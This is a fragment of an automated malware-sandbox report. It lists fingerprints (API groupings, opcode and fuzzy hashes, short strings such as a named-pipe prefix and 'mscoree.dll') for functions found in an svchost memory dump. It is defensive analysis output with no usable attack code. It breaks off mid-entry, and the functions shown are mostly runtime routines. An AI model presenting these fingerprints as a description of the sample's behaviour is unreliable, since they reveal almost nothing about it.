                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: 5c996072e7495a570841e87374aa50147b4650859bf0fccf7ad7f1c2ba7911ee
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: D4018CB1320A8382EB90DB52A8687E963A1F788FC1F884035DE4D43B65DF3CC989C701
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: 7e45d6de1701cbc48d00c2f5e89c2684de88328f7a74c5b911fd512dc97d2502
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: 74012DB9321B4382EF659B62E8283FA73A0BB55B86F940538CD4907764EF3DC108C702
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 87c6860d37f0f3b42e4d04458acec92380321f76e05e6566a8e7a1b9f8bd8476
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 2351BEBA7216038BEB54DF15E468BF93796F348BA8FA18134DE0647788EB75C841C702
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 17ddcd350c3fbab4c69cdfef475f0483a489c2ef7412cbcd3883b63ab174adac
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: 5A31E07A32064387EB10DF11E8687E937A8F344BD8F958124EE4607799DB39C941C706
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: 1b3ecc0efa6a92ca3f3c221fe06cef17b10792bda2791879ca196cc9822a9c58
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: 14F01CB4728B8782EB548B53B9241F96761AB48FD0F889131EE4A47B68DF3CC449C702
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: 771891675fd56f81d4029b47b866c1a450b575f78d7e4331bfb30d922d75a8a2
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: 1DF06DB5221B0781FB508B68E8643F96320FB89BA5FD44239DE6A462F4CF3CC188C311
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction ID: a2ce81cf2cdac8cd3529f73802a6a72a0eb116d24f0474fd80187788a1aaa17d
                                                                      • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction Fuzzy Hash: BA02DD36229B8686E760CB55F4943AEBBA0F3C4784F504125EB8E47BA9DF7DC484CB01
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction ID: 24dc54690249d3895b1b7c38b4582e1f8e2edf1faac8764183dfcb93513ee1e5
                                                                      • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction Fuzzy Hash: 1561CD3A629B87C6F760CB15E4643AA7BA4F388784F900125EE8D47BA8DB7DC450CF01
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: c7ddc661428dab41173e4d3144494a3fabc548170c45f95645eedb0a9107dcdf
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: EE119EF2B70A5321F76565A8E8723F933446B683B8FD90634ED76266F68B38D8414202
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 302e9147bf9768ba2ee2bef3a396fc63e43c9e22c51b2e116c3aec92e75da88d
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 32519E7A1213838AEB648F2595A43FD77A0F354B88F944126EE9947BD5CB38D490C70A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0